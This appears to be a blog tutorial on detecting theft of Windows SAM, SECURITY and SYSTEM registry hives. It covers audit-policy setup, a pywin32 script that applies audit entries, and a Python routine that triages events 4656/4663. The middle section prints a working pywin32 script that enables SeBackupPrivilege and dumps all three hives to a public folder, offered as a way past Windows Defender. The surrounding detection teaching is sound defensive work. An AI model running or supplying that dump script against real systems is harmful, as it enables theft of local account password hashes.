
You guys know what time it is? IT’S GO TIME! Time to dive in and learn how to detect a red teamer trying to grab your local SAM hashes from the registry.

Detecting SAM Registry Hive Dumps - The Setup

First, open up gpedit.msc

Next, navigate to Computer Configuration > Windows Settings > Security Settings > Advanced Audit Policy Configuration > System Audit Policies > Object Access and enable the highlighted subcategories for Success. The one that matters for this writeup is Audit Registry (it is what makes Windows honor the per-key auditing entries we add below; Audit Handle Manipulation adds the matching handle-close events). The rest are there to prepare you for the next writeup, where we will be detecting thumbdrives as they are plugged into any USB port!

image

Okay, now for the tedious part…we need to add an auditing entry (a SACL) to all three hive keys under HKEY_LOCAL_MACHINE: SAM, SECURITY and SYSTEM.

We will start with setting up auditing for the SAM registry hive key:

Open regedit.exe

Right-click on HKEY_LOCAL_MACHINE\SAM

image

Choose "Permissions"

image

Choose "Advanced"

image

Okay, for this next part switch to the Auditing tab and click Add to create a new auditing entry. Select "Everyone" as the principal, since we want to audit every account that tries to access this registry key. Once that principal is selected, it will look like this:

image

Also make sure "Applies to" is set to "This key only".

Almost there. Next, double-click on the newly created "Everyone" entry and choose "Show advanced permissions" in the upper-right corner. Leave the Type as Success (an elevated red teamer's dump will succeed, so a failure-only audit would miss it) and tick the access types you want audited.

That will need to look like this:

image

PHEW! Glad that’s over with….or is it?!?! Well, sort of. We still have to do what we just did with the SAM key for the SECURITY and SYSTEM keys. But I don’t feel like creating images and typing all this out again, so here’s what we’re going to do. I’m going to list below what you need to do for the SECURITY and SYSTEM keys for your auditing config needs. Let’s go!

HKEY_LOCAL_MACHINE\SECURITY

  • Everyone
    • This key only

HKEY_LOCAL_MACHINE\SECURITY\Cache

  • Everyone
    • This key and subkeys

HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets

  • Everyone
    • This key and subkeys

HKEY_LOCAL_MACHINE\SYSTEM

  • Everyone
    • This key only
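The same five auditing entries, applied from code instead of clicking through regedit. This is an added example and not part of the original post; it assumes Windows, pywin32 and an elevated prompt, uses SetNamedSecurityInfo (which needs SeSecurityPrivilege to write a SACL), and runs the auditpol equivalent of the gpedit step. The audited access mask (KEY_READ) is this example's choice, since the screenshot above is the only record of which boxes the post ticked.

```python
"""Added example (not from the original post): put the same "Everyone" audit entries on the
hive keys with pywin32 instead of clicking through regedit. Assumes Windows, pywin32 installed,
and an elevated prompt. Also enables the Object Access > Audit Registry subcategory via auditpol,
which is the gpedit step from the setup section."""
import subprocess
import sys

try:  # pywin32 is Windows-only; the guard lets the planning helpers import anywhere
    import win32api
    import win32con
    import win32security
except ImportError:
    win32api = win32con = win32security = None

# (registry path under HKLM, applies to subkeys?) -- mirrors the list from the setup section
AUDIT_TARGETS = [
    ("SAM", False),
    ("SECURITY", False),
    ("SECURITY\\Cache", True),
    ("SECURITY\\Policy\\Secrets", True),
    ("SYSTEM", False),
]

CONTAINER_INHERIT_ACE = 0x2  # winnt.h ACE flag meaning "this key and subkeys"
KEY_READ = 0x20019           # QUERY_VALUE | ENUMERATE_SUB_KEYS | NOTIFY | READ_CONTROL (this example's choice)


def ace_flags(applies_to_subkeys):
    """ACE flags for an audit entry: 0 means "this key only"."""
    return CONTAINER_INHERIT_ACE if applies_to_subkeys else 0


def planned_entries(targets=AUDIT_TARGETS):
    """(SetNamedSecurityInfo object name, ACE flags, access mask) for each target key."""
    return [("MACHINE\\" + path, ace_flags(sub), KEY_READ) for path, sub in targets]


def enable_privilege(name):
    """Enable a privilege on the current process token and confirm it is now enabled."""
    token = win32security.OpenProcessToken(win32api.GetCurrentProcess(),
                                           win32con.TOKEN_ADJUST_PRIVILEGES | win32con.TOKEN_QUERY)
    luid = win32security.LookupPrivilegeValue(None, name)
    win32security.AdjustTokenPrivileges(token, False, [(luid, win32security.SE_PRIVILEGE_ENABLED)])
    # AdjustTokenPrivileges does not raise when the privilege is simply not held, so check the token
    return any(l == luid and attrs & win32security.SE_PRIVILEGE_ENABLED
               for l, attrs in win32security.GetTokenInformation(token, win32security.TokenPrivileges))


def add_audit_entry(object_name, flags, access_mask, success=True, failure=False):
    """Append an "Everyone" audit ACE to the key's existing SACL and write the SACL back."""
    everyone = win32security.ConvertStringSidToSid("S-1-1-0")
    sd = win32security.GetNamedSecurityInfo(object_name, win32security.SE_REGISTRY_KEY,
                                            win32security.SACL_SECURITY_INFORMATION)
    sacl = sd.GetSecurityDescriptorSacl() or win32security.ACL()
    sacl.AddAuditAccessAceEx(win32security.ACL_REVISION, flags, access_mask, everyone,
                             int(success), int(failure))
    win32security.SetNamedSecurityInfo(object_name, win32security.SE_REGISTRY_KEY,
                                       win32security.SACL_SECURITY_INFORMATION,
                                       None, None, None, sacl)


if __name__ == "__main__":
    if win32security is None:
        sys.exit("[!] pywin32 on Windows is required")
    if not enable_privilege("SeSecurityPrivilege"):
        sys.exit("[!] SeSecurityPrivilege not held; run from an elevated prompt")
    # same switch as the gpedit step: Object Access > Audit Registry, success events
    subprocess.run(["auditpol", "/set", "/subcategory:Registry", "/success:enable"], check=True)
    for name, flags, mask in planned_entries():
        add_audit_entry(name, flags, mask)
        print("[+] audit entry added on", name)
```

Run it once from an elevated prompt; `auditpol /get /subcategory:Registry` afterwards should report Success, and the Auditing tab in regedit will show the new Everyone entries. Because lsass.exe legitimately opens these keys, expect the audit to fire for it too; the detection side has to filter on the process.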

Detecting SAM Registry Hive Dumps - Execution Time!!!

Okay, you can choose to dump the SAM, SECURITY, and SYSTEM hives manually via regedit.exe (Export as "Registry Hive Files") or reg.exe save, but you’ll likely get snagged by Windows Defender AV. Or….you could do it the tactical way. Let’s go the tactical route. We’re going to use Python (with pywin32) to write our registry dump script:

Download the raw python script here: dumpy.py

Or, simply copy and paste it from here:

import sys

import pywintypes
import win32api
import win32con
import win32security


def ElevatedorNot():
    # TokenElevation is 1 only for a full (UAC-elevated) administrator token
    thehandle = win32security.OpenProcessToken(win32api.GetCurrentProcess(), win32con.TOKEN_QUERY)
    elevated = win32security.GetTokenInformation(thehandle, win32security.TokenElevation)
    if elevated == 1:
        print("[+] elevated status: TokenIsElevated!!!")
        return True
    print("[!] token is not elevated...")
    return False

def SetBackupPrivilege():
    # RegSaveKey needs SeBackupPrivilege; admins hold it, but it stays disabled until enabled here
    try:
        thehandle = win32security.OpenProcessToken(win32api.GetCurrentProcess(), win32con.TOKEN_ADJUST_PRIVILEGES | win32con.TOKEN_QUERY)
        priv = win32security.LookupPrivilegeValue(None, "SeBackupPrivilege")
        win32security.AdjustTokenPrivileges(thehandle, False, [(priv, win32security.SE_PRIVILEGE_ENABLED)])
        # AdjustTokenPrivileges does not fail when the privilege is not held, so confirm it is enabled
        enabled = any(luid == priv and attrs & win32security.SE_PRIVILEGE_ENABLED
                      for luid, attrs in win32security.GetTokenInformation(thehandle, win32security.TokenPrivileges))
        if not enabled:
            print("[!] SeBackupPrivilege is not held by this token...")
            return False
        print("[+] successfully gained SeBackupPrivilege!!!!")
        return True
    except pywintypes.error as e:
        print("[!] couldn't get SeBackupPrivilege:", e)
        return False

def dumpreg():
    # Each hive is opened and written out with RegSaveKey (backup semantics) into a folder any user can read
    #Sam File
    samhandle = win32api.RegOpenKeyEx(win32con.HKEY_LOCAL_MACHINE, "SAM", 0, win32con.KEY_ALL_ACCESS)
    win32api.RegSaveKey(samhandle, "c:\\users\\public\\sam.save", None)
    win32api.RegCloseKey(samhandle)

    #System File
    systemhandle = win32api.RegOpenKeyEx(win32con.HKEY_LOCAL_MACHINE, "SYSTEM", 0, win32con.KEY_ALL_ACCESS)
    win32api.RegSaveKey(systemhandle, "c:\\users\\public\\system.save", None)
    win32api.RegCloseKey(systemhandle)

    #Security File (we don't have permissions to get this by default...but it's really only useful for domain creds and I just want local admin)
    try:
        securityhandle = win32api.RegOpenKeyEx(win32con.HKEY_LOCAL_MACHINE, "SECURITY", 0, win32con.KEY_ALL_ACCESS)
        win32api.RegSaveKey(securityhandle, "c:\\users\\public\\security.save", None)
        win32api.RegCloseKey(securityhandle)
    except pywintypes.error as e:
        print("you don't have permission to grab the SECURITY file...", e)
        return False
    return True

if not ElevatedorNot():
    print("[!] not elevated...\n")
    sys.exit(1)
if not SetBackupPrivilege():
    print("[!] could not get SeBackupPrivilege...\n")
    sys.exit(1)
if dumpreg():
    print("[+] Successfully dumped SAM, SYSTEM, and SECURITY files!!!\n")
else:
    print("[!] dumped SAM and SYSTEM, but not SECURITY\n")

Save it, and run it from an elevated prompt (the script exits if the token is not elevated):

image

If everything was set up correctly, you should see event ID 4656 (A handle to an object was requested) and 4663 (An attempt was made to access an object) in the Windows Security log, with Object Type "Key" and Object Name \REGISTRY\MACHINE\SAM (and likewise SYSTEM and SECURITY), the Process Name pointing at python.exe, and the 4656 event listing SeBackupPrivilege under "Privileges Used for Access Check":

image

And last but certainly not least, in Elastic!

image

image
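Here is what the blue-team side of this looks like as code: a small triage routine run over Security-log records in the XML shape that wevtutil and Get-WinEvent emit. This is an added example and not part of the original post or its Elastic setup; the event records below are constructed samples, and the lsass.exe allowlist and the output format are this example's assumptions.

```python
"""Added example (not from the original post): triage registry audit events for hive reads.
Input is Windows Security log XML as produced by `wevtutil qe Security /f:xml` or
Get-WinEvent's ToXml(). The records below are constructed samples, not real captures."""
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Keys carrying the audit entries from the setup section. SAM, SECURITY and SYSTEM were audited
# as "this key only", so only an exact match counts; the two SECURITY subkeys inherit to children.
HIVE_ROOTS = {r"\REGISTRY\MACHINE\SAM", r"\REGISTRY\MACHINE\SECURITY", r"\REGISTRY\MACHINE\SYSTEM"}
HIVE_PREFIXES = (r"\REGISTRY\MACHINE\SECURITY\CACHE", r"\REGISTRY\MACHINE\SECURITY\POLICY\SECRETS")

# Processes that touch these keys as part of normal operation (assumption for this example; tune per host)
BASELINE_PROCESSES = {r"c:\windows\system32\lsass.exe"}


def parse_event(xml_text):
    """Flatten one Event record into a dict of EventData fields plus the EventID."""
    root = ET.fromstring(xml_text)
    fields = {d.get("Name"): (d.text or "") for d in root.iterfind("e:EventData/e:Data", NS)}
    fields["EventID"] = root.findtext("e:System/e:EventID", namespaces=NS)
    return fields


def targets_hive(object_name):
    """True when the object name is one of the audited hive keys (case-insensitive)."""
    name = object_name.upper()
    return name in HIVE_ROOTS or name.startswith(HIVE_PREFIXES)


def triage(xml_records):
    """One finding per 4656/4663 event that reaches an audited hive key from a non-baseline process."""
    findings = []
    for record in xml_records:
        ev = parse_event(record)
        if ev["EventID"] not in ("4656", "4663") or ev.get("ObjectType") != "Key":
            continue
        if not targets_hive(ev.get("ObjectName", "")):
            continue
        if ev.get("ProcessName", "").lower() in BASELINE_PROCESSES:
            continue
        findings.append({
            "event_id": ev["EventID"],
            "user": ev.get("SubjectUserName", ""),
            "process": ev.get("ProcessName", ""),
            "key": ev.get("ObjectName", ""),
            # 4656 carries the privileges used for the access check; SeBackupPrivilege is exactly
            # what the dump script enables, so its presence is the strongest single signal here.
            "backup_privilege": "SeBackupPrivilege" in ev.get("PrivilegeList", ""),
        })
    return findings


def _sample(event_id, **data):
    """Build a minimal Security-log record in the wevtutil XML shape (constructed sample)."""
    items = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID></System>'
            f"<EventData>{items}</EventData></Event>")


SAMPLE_RECORDS = [  # constructed: one dump attempt, one lsass baseline read, one secrets read, one unrelated key
    _sample(4656, SubjectUserName="bob", ObjectType="Key", ObjectName=r"\REGISTRY\MACHINE\SAM",
            AccessMask="0xF003F", PrivilegeList="SeBackupPrivilege", ProcessName=r"C:\Python39\python.exe"),
    _sample(4663, SubjectUserName="SYSTEM", ObjectType="Key", ObjectName=r"\REGISTRY\MACHINE\SAM",
            AccessMask="0x1", ProcessName=r"C:\Windows\System32\lsass.exe"),
    _sample(4663, SubjectUserName="bob", ObjectType="Key",
            ObjectName=r"\REGISTRY\MACHINE\SECURITY\Policy\Secrets\DPAPI_SYSTEM",
            AccessMask="0x1", ProcessName=r"C:\Python39\python.exe"),
    _sample(4663, SubjectUserName="bob", ObjectType="Key", ObjectName=r"\REGISTRY\MACHINE\SOFTWARE\Microsoft",
            AccessMask="0x1", ProcessName=r"C:\Python39\python.exe"),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_RECORDS):
        print(finding)
```

Fed the constructed records, `triage` returns two findings: the python.exe handle request on \REGISTRY\MACHINE\SAM (flagged with backup_privilege True) and the read under SECURITY\Policy\Secrets; the lsass.exe read and the SOFTWARE key access are dropped. To run it against a live box, split the output of `wevtutil qe Security /f:xml` on `</Event>` and pass the pieces in.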

Hope this helps my fellow red team and blue teamers out there. It’s knowledge you need regardless of which role you’re in. 😸 Blue team for obvious reasons. Red team, to see the possibilities built-in to Windows for detecting your clever tricks. Until next time, adios!
